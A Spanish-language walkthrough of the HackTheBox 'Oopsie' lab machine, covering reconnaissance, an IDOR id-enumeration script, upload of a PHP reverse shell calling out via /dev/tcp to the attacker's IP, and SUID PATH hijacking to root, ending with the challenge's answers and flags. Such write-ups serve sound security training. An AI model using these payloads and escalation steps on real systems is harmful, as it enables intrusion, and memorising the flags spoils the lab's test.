beafn28
  • 👩‍💻¡Bienvenidos a mi HackBook!
  • WRITEUPS
    • DockerLabs
      • BuscaLove
      • Amor
      • Injection
      • BorazuwarahCTF
      • Trust
      • Picadilly
      • Pinguinazo
      • AguaDeMayo
      • BreakMySSH
      • NodeClimb
      • Move
      • Los 40 ladrones
      • Vulnvault
      • Pntopntobarra
      • Library
      • Escolares
      • ConsoleLog
      • Vacaciones
      • Obsession
      • FirstHacking
      • SecretJenkins
      • HedgeHog
      • AnonymousPingu
      • ChocolateLovers
      • Dockerlabs
      • Pressenter
      • Candy
      • JenkHack
      • ShowTime
      • Upload
      • Verdejo
      • WalkingCMS
      • WhereIsMyWebShell
      • Whoiam
      • Winterfell
      • -Pn
      • Psycho
      • Mirame
      • Backend
      • Paradise
      • Balurero
      • Allien
      • Vendetta
      • FindYourStyle
      • Stellarjwt
      • File
      • Redirection (Por completar)
      • Extraviado
      • Patriaquerida
      • Tproot
      • Internship
      • Walking Dead
      • Bicho (Por completar)
      • BaluFood
    • TryHackMe
      • Brooklyn Nine Nine
      • Blue
    • HackTheBox
      • Nibbles
      • Starting Point
        • Meow
        • Fawn
        • Dancing
        • Redeemer
        • Appointment
        • Sequel
        • Crocodile
        • Responder
        • Three
        • Archetype
        • Oopsie
        • Vaccine
        • Unified
        • Explosion
        • Preignition
        • Mongod
        • Synced
        • Ignition
        • Bike
        • Funnel
        • Pennyworth
        • Tactics
        • Included
        • Markup
        • Base
      • BoardLight
      • Cap
      • TwoMillion
      • Lame
      • Legacy
      • Devel
      • Beep
      • Optimum
      • Arctic
      • Jerry
      • Sau
      • GoodGames
      • Challenges
        • Emdee five for life
        • MarketDump
      • Intro to Dante
      • Heist
      • OpenAdmin
      • Nest
      • Curling
    • Vulnhub
      • Wakanda
      • Election (Por terminar)
    • The Hacker Labs
      • Avengers
      • Can you hack me?
      • Fruits
      • Microchoft
      • TickTakRoot
      • Grillo
      • Mortadela
      • Zapas Guapas
      • Sal y Azúcar
      • Cyberpunk
      • Papafrita
      • PizzaHot
      • Decryptor
      • Academy
      • Cocido andaluz
      • Find Me
      • Quokka
      • Campana Feliz
      • Bocata de Calamares
      • Casa Paco
      • Torrijas
    • Vulnyx
      • Fuser
      • Blogguer
      • Lower
      • Exec
      • Diff3r3ntS3c
      • Hacking Station
      • Experience
      • Eternal
      • Agent
      • Infected
      • Admin
      • War
      • Hosting
    • OverTheWire
      • Natas
        • Nivel 0-5
        • Nivel 6-11
        • Nivel 12-17
        • Nivel 18-23
        • Nivel 24-29
        • Nivel 30-34
      • Leviathan
        • Nivel 0-7
      • Krypton
      • Bandit
        • Nivel 0-10
        • Nivel 11-20
        • Nivel 21-30
        • Nivel 31-34
    • Proving Ground Play
      • Monitoring
      • DriftingBlues6
  • APUNTES HACKING
    • Pentesting Basics
      • Web Enumeration
      • Public Exploits
      • Types of Shells
      • Privilege Escalation
      • Transfering Files
    • Network Enumeration with NMAP
      • Host Discovery
      • Host and Port Scanning
      • Saving the Results
      • Service Enumeration
      • Nmap Scripting Engine
      • Performance
      • Firewall and IDS/IPS Evasion
    • Footprinting
      • Domain Information
      • Cloud Resources
      • FTP
      • SMB
      • NFS
      • DNS
      • SMTP
      • IMAP/POP3
      • SNMP
      • MySQL
      • MSSQL
      • Oracle TNS
      • IPMI
      • Linux Remote Management Protocols
      • Windows Remote Management Protocols
    • Information Gathering - Web Edition
      • WHOIS
      • DNS
        • Digging DNS
      • Subdomains
        • Subdomain Bruteforcing
        • DNS Zone Transfers
        • Virtual Hosts
        • Certificate Transparency Logs
      • Fingerprinting
      • Crawling
        • robots.txt
        • Well-Known URIs
        • Creepy Crawlies
      • Search Engine Discovery
      • Web Archives
      • Automating Recon
    • Vulnerability Assessment
      • Vulnerability Assessment
      • Assessment Standards
      • Common Vulnerability Scoring System (CVSS)
      • Common Vulnerabilities and Exposures (CVE)
    • Nessus
      • Getting Started with Nessus
      • Nessus Scan
      • Advanced Settings
      • Working with Nessus Scan Output
      • Scanning Issues
    • OpenVAS
      • OpenVAS Scan
      • Exporting The Results
    • Reporting
    • File Transfers
      • Windows File Transfer Methods
      • Linux File Transfer Methods
      • Transferring Files with Code
      • Miscellaneous File Transfer Methods
      • Protected File Transfers
      • Catching Files over HTTP/S
      • Living off The Land
      • Detection
      • Evading Detection
    • Shells & Payloads
      • Anatomy of a Shell
      • Bind Shells
      • Reverse Shells
      • Payloads
        • Automating Payloads & Delivery with Metasploit
        • Crafting Payloads with MSFvenom
        • Infiltrating Windows
        • Infiltrating Unix/Linux
        • Spawning Interactive Shells
      • Introduction to Web Shells
        • Laudanum, One Webshell to Rule Them All
        • Antak Webshell
        • PHP Web Shells
      • Detection & Prevention
    • Metasploit
      • MSFConsole
      • Modules
      • Targets
      • Payloads
      • Encoders
      • Databases
      • Plugins
      • Sessions
      • Meterpreter
      • Writing and Importing Modules
      • Introduction to MSFVenom
      • Firewall and IDS/IPS Evasion
    • Password Attacks
      • John The Ripper
      • Network Services
      • Password Mutations
      • Password Reuse / Default Passwords
      • Attacking SAM
      • Attacking LSASS
      • Attacking Active Directory & NTDS.dit
      • Credential Hunting in Windows
      • Credential Hunting in Linux
      • Passwd, Shadow & Opasswd
      • Pass the Hash (PtH)
  • WEB SECURITY
    • Path Traversal
    • SQL Injection
    • Control de Acceso
  • Mis CTFs
    • Pequeñas Mentirosas
    • CryptoLabyrinth
    • Elevator
    • Facultad
  • PREPARAR EJPTv2
    • Máquinas
    • Curso de Mario
      • Presentación + Preparación de Laboratorios
      • Conceptos Básicos de Hacking
      • Explotación de Vulnerabilidades y Ataques de Fuerza Bruta
      • Explotación vulnerabilidades Web
      • Enumeración y Explotación del Protócolo SMB, SAMBA, SNMP, IIS y RDP
      • Hacking Entornos CMS
      • Escalada de Privilegios + Post Explotación
      • Pivoting con Metasploit
  • Preparar OSCP
    • Información
    • Máquinas
      • Linux
        • Fácil
        • Medio
        • Difícil
      • Windows
        • Fácil
        • Medio
        • Difícil
Powered by GitBook
On this page
  • 1. 📝 Introducción
  • 2. 🛠️ Entorno
  • 3. 🔍 Reconocimiento
  • 4. 🚪 Acceso Inicial
  • 5. 🔑 Captura de la Flag
  • 6. ❓Preguntas

Was this helpful?

  1. WRITEUPS
  2. HackTheBox
  3. Starting Point

Oopsie

1. 📝 Introducción

  • Nivel de Dificultad: Muy fácil.

  • Tags:

    • PHP: Lenguaje de programación utilizado en aplicaciones web personalizadas.

    • Apache: Servidor web ampliamente utilizado para alojar aplicaciones web.

    • Reconnaissance: Fase de recopilación de información para descubrir la estructura del sitio web.

    • Cookie Manipulation: Alteración de cookies para eludir medidas de seguridad.

    • SUID Exploitation: Explotación de archivos con el bit SUID establecido para escalar privilegios.

    • Authentication Bypass: Evasión de mecanismos de autenticación.

    • Clear Text Credentials: Credenciales transmitidas en texto plano, sin cifrado.

    • Arbitrary File Upload: Subida de archivos maliciosos para comprometer un sistema.

    • Insecure Direct Object Reference (IDOR): Acceso no autorizado a objetos o recursos a través de referencias directas inseguras.

    • Path Hijacking: Manipulación de rutas para ejecutar archivos maliciosos o acceder a información sensible.

2. 🛠️ Entorno

Nos descargamos nuestra VPN y nos conectamos.

sudo openvpn nombre_del_archivo.vpn

Iniciamos la máquina y verificamos la conexión.

ping -c 1 10.129.245.165

Observamos que tenemos conexión y que es una máquina Linux ya que su ttl=63.

3. 🔍 Reconocimiento

A continuación, se realiza el comando:

nmap -p- --min-rate 5000 -sV 10.129.245.165

para realizar un escaneo de puertos y servicios detallado en la dirección IP.

4. 🚪 Acceso Inicial

Como podemos observar durante el escaneo el puerto 22 perteneciente al servicio SSH y el puerto 80 perteneciente al servicio HTTP están abiertos, por lo que se procederá a indagar más.

Revisando el código fuente encontramos esto interesante.

Las credenciales son las de la máquina anterior de Archetype por lo que iniciamos sesión.

En las demás páginas, encontramos información sobre la marca y los clientes. Sin embargo, no podemos acceder a la página de Uploads porque no tenemos los permisos necesarios; se requieren derechos de super administrador.

El parámetro id en la URL parece indicar que id=1 corresponde al Administrador.

¿Podríamos obtener información sobre el usuario super admin si logramos adivinar su id? Probemos con el siguiente script en Python:

#!/bin/python3

import requests
import signal
import threading
import logging
import sys

def def_handler(sig, frame):
    print("\n[!] Deteniendo el proceso...\n")
    sys.exit(1)

# Ctrl+C
signal.signal(signal.SIGINT, def_handler)

# Variables globales
login_url = "http://10.129.245.165/cdn-cgi/login/index.php"
accounts_url = "http://10.129.245.165/cdn-cgi/login/admin.php?content=accounts&id="

def makeRequest():
    s = requests.session()

    post_data = {
        'username': 'admin',
        'password': 'MEGACORP_4dm1n!!'
    }

    p = s.post(login_url, data=post_data)
    for x in range(100):
        print(f"[+] Probando id: {x}")
        r = s.get(accounts_url + str(x))
        if 'super' in r.text:
            print(f"[+] Id del super admin encontrado: {x}")
            break

if __name__ == '__main__':
    try:
        threading.Thread(target=makeRequest, args=()).start()
    except Exception as e:
        logging.error(str(e))

Al ejecutar el código, vemos que el id del super admin es 30, ya que la respuesta contiene la palabra super.

Ahora buscaremos directorios con la herramienta Gobuster a través de:

gobuster dir -u http://10.129.245.165/ -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt

Es posible que el desarrollador haya olvidado implementar la validación de entrada de usuario, por lo que deberíamos probar si podemos subir otros archivos, como una shell web en PHP.

Logramos subir la siguiente reverse shell en PHP (shell.php):

<?php
  exec("/bin/bash -c 'bash -i &> /dev/tcp/YOUR_IP/443 0<&1'");
?>

Durante nuestra enumeración del sitemap con Disbuster, encontramos un directorio llamado /uploads, que probablemente contenga el archivo que subimos.

Ahora, iniciamos un listener en el puerto 443 con:

nc -lvnp 443

5. 🔑 Captura de la Flag

Una vez dentro investigamos distintos directorios para ver donde se encuentra la flag. La flag se encuentra en el directorio /home/robert.

Debemos escalar privilegios para encontrar la flag del root. Parece ser las credenciales para conectarnos a través de SSH.

Pertenece al grupo bugtracker.

Hacemos estos comandos en robert.

cd /tmp
echo "/bin/bash" > cat
export PATH=/tmp:$PATH
/usr/bin/bugtracker

Tras ejecutarlo hacemos los siguientes.

whoami
vim /root/root.txt

Si ponemos cat /root/root.txt no se mostrará la flag

6. ❓Preguntas

Tarea 1: ¿Con qué tipo de herramienta se puede interceptar el tráfico web?

proxy Una herramienta que se utiliza para interceptar y analizar el tráfico web, permitiendo ver y modificar las solicitudes y respuestas entre el cliente y el servidor.

Tarea 2: ¿Cuál es la ruta al directorio en el servidor web que devuelve una página de inicio de sesión?

/cdn-cgi/login Este es el directorio en el servidor web que muestra una página de inicio de sesión, lo que indica un punto de acceso para la autenticación.

Tarea 3: ¿Qué se puede modificar en Firefox para obtener acceso a la página de carga?

cookie Modificar la cookie en Firefox puede proporcionar acceso a la página de carga de archivos que normalmente está restringida.

Tarea 4: ¿Cuál es el ID de acceso del usuario administrador?

34322 El ID de acceso del usuario administrador es 34322, y puede ser usado para acceder a funciones administrativas en el sistema.

Tarea 5: Al subir un archivo, ¿en qué directorio aparece ese archivo en el servidor?

/uploads Los archivos subidos al servidor se almacenan en el directorio /uploads, donde pueden ser accesibles o procesados posteriormente.

Tarea 6: ¿Qué archivo contiene la contraseña compartida con el usuario robert?

db.php El archivo db.php contiene la contraseña compartida con el usuario robert, lo que puede permitir el acceso a la base de datos o a otras áreas del sistema.

Tarea 7: ¿Qué ejecutable se usa con la opción "-group bugtracker" para identificar todos los archivos propiedad del grupo bugtracker?

find El comando find se ejecuta con la opción -group bugtracker para identificar todos los archivos que pertenecen al grupo bugtracker, útil para auditoría o explotación.

Tarea 8: Independientemente de qué usuario inicie el ejecutable bugtracker, ¿con qué privilegios de usuario se ejecutará?

root El ejecutable bugtracker se ejecuta con privilegios de root, sin importar qué usuario lo inicie, lo que puede ser aprovechado para escalar privilegios.

Tarea 9: ¿Qué significa SUID?

set owner user id El SUID permite que un archivo se ejecute con los privilegios del propietario del archivo, en lugar de los del usuario que lo ejecuta, lo cual es crítico para la escalada de privilegios.

Tarea 10: ¿Cuál es el nombre del ejecutable que se llama de manera insegura?

cat El comando cat se llama de manera insegura, permitiendo que un atacante ejecute su propio código malicioso en lugar del comando legítimo.

Tarea 11: Enviar bandera de ususario

f2c74ee8db7983851ab2a96a44eb7981

Tarea 12: Enviar bandera de root

af13b0bee69f8a877c3faf667f7beacf

PreviousArchetypeNextVaccine

Last updated 8 months ago

Was this helpful?

Probemos acceder a: . Tenemos permisos y hemos encontrado otra página que es un panel de Login.

http://10.129.245.165/cdn-cgi/login/